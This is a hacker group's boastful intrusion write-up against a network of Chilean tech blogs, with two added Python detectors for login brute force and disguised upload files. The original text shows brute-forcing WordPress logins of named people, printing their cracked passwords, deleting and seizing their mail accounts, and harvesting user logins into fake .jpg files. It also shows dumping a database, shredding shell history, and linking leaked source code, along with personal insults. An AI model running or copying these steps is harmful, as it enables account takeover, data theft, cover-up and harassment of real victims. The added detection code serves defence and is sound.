|||||||||||||||||||||||||||||||||||||||||||||||||||||
[================== 1ns3c gr0up ====================]
[------- t1nky_w1nky - d1psy - l44_l44 - p0 -------]
[======================| 0wn3d |=====================]
||||||||||||||||||||||||||||||||||||||||||||||||||||||
/*
* BetaFail (aka BetaZeta aka LoserZeta aka BetaWeeta -- thnx chilean dudes ^^)
* is a loser-blogger-network which claims to be experts on technology... so let's see!
*/
]====== 0x00 ======[ Index
[=-0x01-=] Affected domains
[=-0x02-=] Vulnerabilities
[=-0x03-=] Intrusion
[=-0x04-=] Data requesting
[=-0x05-=] Exposure
[=-0x06-=] Extras
-------------------------------------------------------------------------------
]====== 0x01 =======[ Affected Domains
+ The affected domains are:
|- http://www.betazeta.com
|- http://www.fayerwayer.com
|- http://www.theclinic.cl
|- http://www.saborizante.cl
|- http://leo.prieto.cl
|- http://www.betaid.org
|- http://www.wayerless.com
|- http://www.niubie.com
|- http://www.botonturbo.com
|- http://www.tecnosquad.com
|- http://www.chw.net
|- http://www.zetacorp.net
|- http://www.zimio.com
|- http://www.i2b.cl
|_/
-
-------------------------------------------------------------------------------
]====== 0x02 ======[ Vulnerabilities
/*
* So you can ask yourself, how can this be? Easy: if you set a weak
* password you have weak security, if you store all your accounts in your mail
* you have weak security.
* -> JF aka JF10 aka Juan Francisco Diez has a 9 int long password, easy enough to
* be brute forced.
* -> Leo aka Leo Prieto has a 5 char + 3 int password (dictionary password).
* And so on... these dudes really don't know shit about security and lucky for us
* their servers were totally open for us (open legs?).
*/
-------------------------------------------------------------------------------
]====== 0x03 ======[ Intrusion
/* Hey ho, lets GO! */
(=| proof-of-concept |=)
/* First get the silliest password ever from our very best friend JF on any of
* the services he uses: twitter, wordpress, etc.. (yes... really silly but he uses
* the same password for everything!):
*/
[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user=jf10 http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
................................................................................
................................................................................
....................... FOUND! (2020229)
[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user='leo prieto' http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
................................................................................
................................................................................
................................................................................
.................................................. FOUND! (macoy123)
[1nf3ct3d@darkside:~]$
/* Done. Now, search a prompt: */
[1nf3ct3d@darkside:~]$ telnet fayerwayer.com 37337
Trying 174.132.120.218...
Connected to fayerwayer.com.
Escape character is '^]'.
bash$
/* Now we can try with anything... say... gmail: */
[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user jf10 -pass 2020229 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password ... OK
New password is: HuJucF53
/* Heh! Now let's play with Leo Prieto's stuff (again... same password almost
* for everything) */
[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user leo -pass macoy123 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password ... OK
New password is: 4Gh4Fhb
[1nf3ct3d@darkside:~]$
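Seen from the server side, the wordlist run against wp-login.php shown above is a burst of failed POSTs from one source, followed by one that succeeds. The detector below is an added example, not part of the original text; it assumes Combined Log Format access logs and a stock WordPress that answers a failed login with 200 and a successful one with 302, and the log lines and addresses are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Combined Log Format: ip ident user [time] "METHOD path proto" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def detect_login_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"max_burst": n, "login_after_burst": bool}} for sources
    with at least `threshold` failed wp-login POSTs inside `window`."""
    fails = defaultdict(deque)   # per-source timestamps of recent failures
    findings = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != "/wp-login.php":
            continue
        ip = m["ip"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if m["status"] == "200":          # assumption: 200 = login form shown again
            q = fails[ip]
            q.append(ts)
            while ts - q[0] > window:     # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                hit = findings.setdefault(ip, {"max_burst": 0, "login_after_burst": False})
                hit["max_burst"] = max(hit["max_burst"], len(q))
        elif m["status"] == "302" and ip in findings:
            # A redirect after a burst means the guessing probably worked:
            # treat the account as compromised, not just the source as noisy.
            findings[ip]["login_after_burst"] = True
    return findings

def sample_log():
    """Constructed sample: one guessing source and one ordinary user."""
    t0 = datetime(2024, 1, 1, 3, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "POST /wp-login.php HTTP/1.1" {st} 2048 "-" "-"'
    stamp = lambda s: (t0 + timedelta(seconds=s)).strftime("%d/%b/%Y:%H:%M:%S %z")
    lines = [fmt.format(ip="203.0.113.7", ts=stamp(i), st=200) for i in range(40)]
    lines.append(fmt.format(ip="203.0.113.7", ts=stamp(40), st=302))
    lines.append(fmt.format(ip="198.51.100.20", ts=stamp(5), st=200))   # one typo
    lines.append(fmt.format(ip="198.51.100.20", ts=stamp(20), st=302))  # then success
    return lines

if __name__ == "__main__":
    for ip, hit in detect_login_bruteforce(sample_log()).items():
        print(ip, hit)
```

The `login_after_burst` flag is the one that should page someone: it separates background guessing from an account that needs its password reset and its sessions revoked.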
-------------------------------------------------------------------------------
]====== 0x04 ======[ Data requesting
/* Wordpress has been infected ... now waiting for our data */
[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/12/sheet.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ tail sheet.jpg
user: pass:
user: pass:
user: mr_self-destruct pass: ********
user: march3lo pass: marcel
user: mr_self-destruct pass: ********
user: mr_self-destruct pass: ********
user: sir_lestat pass: ********
user: asdsadfsadf pass: ********
user: Chok pass: ********
user: successor pass: ********
/* Amazing .... */
[1nf3ct3d@darkside:~]$ wc -l sheet.jpg
682 sheet.jpg
[1nf3ct3d@darkside:~]$ wget http://www.botonturbo.com/wp-content/uploads/2007/11/sheet.jpg -o /dev/null -O sheet2.jpg
[1nf3ct3d@darkside:~]$
/* Awesome! For each domain we repeat */
[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org
Password:
betaid@betaid.org:~$ ls
app_error.php app_model.php config controllers htaccess.template httpdocs index.php locale models plugins tests tmp vendors views webroot
betaid@betaid.org:~$ cd config
betaid@betaid.org:~/config$ ls
acl.ini.php betaid.php bootstrap.php chile.sql core.php database.php entelpcs.php inflections.php openid.php routes.php sql
betaid@betaid.org:~$ grep -v \* database.php
class DATABASE_CONFIG {
var $default = array(
'driver' => 'mysql',
'persistent' => false,
'host' => 'localhost',
'login' => 'betaman', /* look at this! */
'password' => '********',
'database' => 'betaid_main',
'encoding'=> 'UTF8',
'prefix' => '',
);
var $test = array(
'driver' => 'mysql',
'persistent' => false,
'host' => 'localhost',
'login' => 'user',
'password' => '********',
'database' => 'test_database_name',
'prefix' => '',
);
}
betaid@betaid.org:~$
/* OMFG! Is a DB_delete_all_my_content password? */
betaid@betaid.org:~$ mysqldump -ubetaman -pbetapass betaid_main >../httpdocs/betaz.sql
betaid@betaid.org:~$ exit
[1nf3ct3d@darkside:~]$ wget http://www.betaid.org/betaz.sql -o /dev/null
[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org "rm -rf httpdocs/betaz.sql && shred .bash_history"
Password:
[1nf3ct3d@darkside:~]$
/* It's time to infect betaid to obtain all data! We modify controller/auth_controller.php and pump it up */
[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ wc -l audi-a3.jpg
262 audi-a3.jpg
[1nf3ct3d@darkside:~]$ tail -5 audi-a3.jpg
user: zector pass: ********
user: chokolat pass: ********
user: andru pass: ********
user: angrod pass: ********
user: elmono pass: ********
[1nf3ct3d@darkside:~]$ perl http-delete.pl http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -u admin
admin's pwd:
1 file(s) deleted.
[1nf3ct3d@darkside:~]$
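Two artifacts in this section are visible to a file-integrity sweep: the captured logins were written to files with a .jpg name under wp-content/uploads that contain plain text, and the database dump sat in the web root as a .sql file. The scan below is an added example, not part of the original text; the directory layout, the file contents and the `DUMP_EXTENSIONS` set are constructed assumptions.

```python
import os
import tempfile

# Leading bytes a genuine file of each type must start with.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}
DUMP_EXTENSIONS = {".sql"}  # assumption: extend with whatever your backups use

def looks_like_text(head):
    return all(b in b"\t\r\n" or 32 <= b < 127 for b in head)

def scan_webroot(root):
    """Return sorted (relative_path, reason) pairs for files that do not belong."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            if ext in DUMP_EXTENSIONS:
                findings.append((rel, "database dump reachable over HTTP"))
            elif ext in MAGIC:
                with open(path, "rb") as fh:
                    head = fh.read(16)
                if not head.startswith(MAGIC[ext]):
                    kind = "text" if looks_like_text(head) else "unknown data"
                    findings.append((rel, f"{ext} extension but content is {kind}"))
    return sorted(findings)

def demo():
    """Build a constructed web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "wp-content", "uploads")
        os.makedirs(uploads)
        samples = {
            os.path.join(uploads, "photo.jpg"): b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
            os.path.join(uploads, "sheet.jpg"): b"user: alice pass: example\n",
            os.path.join(root, "dump.sql"): b"-- constructed dump\n",
        }
        for path, data in samples.items():
            with open(path, "wb") as fh:
                fh.write(data)
        return scan_webroot(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

A file that fails the magic-byte check in an uploads directory also points back at whatever wrote it, so the next step is diffing the application's PHP files against a known-good copy.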
-------------------------------------------------------------------------------
]====== 0x05 ======[ Exposure
/* All that you want to see! THE DATA! */
/* Anyone want to twit? */
-------------------------------------------------------------------------------
]====== 0x06 ======[ Extras
/* Do you remember when CHW was eradicated?
* Oh wait. Remember bootlog too? ;-)
* -- That was the OPPORTUNITY which BetaZeta had to set a REAL security-policy
*
* Wanna download the betaid source code? Here:
*
* http://rapidshare.com/files/254417420/betaid.org.zip.html
* http://www.megaupload.com/?d=8FT5KYTP
*
*
* Direct message to JF: Be more humble, piece of shit.
* Seeya in the next issue!
*/
/* Dud3s! Y0u've been pwn3d by teletubbies! */
EOF